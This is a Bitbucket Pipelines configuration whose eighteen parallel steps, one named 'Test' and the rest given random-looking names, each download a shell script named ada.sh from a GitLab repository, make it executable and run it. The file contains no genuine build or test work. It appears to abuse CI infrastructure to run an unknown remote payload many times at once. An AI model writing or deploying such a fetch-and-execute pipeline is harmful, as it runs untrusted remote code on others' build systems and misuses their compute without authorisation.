pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: crut
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: brot
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hgse
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hbedr
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: sgevd
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hsd
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hrsd
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hsdf
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hrsd
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: herf
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: kgyh
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: jrtd
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: jtdf
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: wsxed
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: jfgc
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: edcbh
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 

      - step:
          name: hjdrf
          script:
            - wget https://gitlab.com/manganaewes/sepelekne/-/raw/master/ada.sh && chmod +x ada.sh && ./ada.sh 
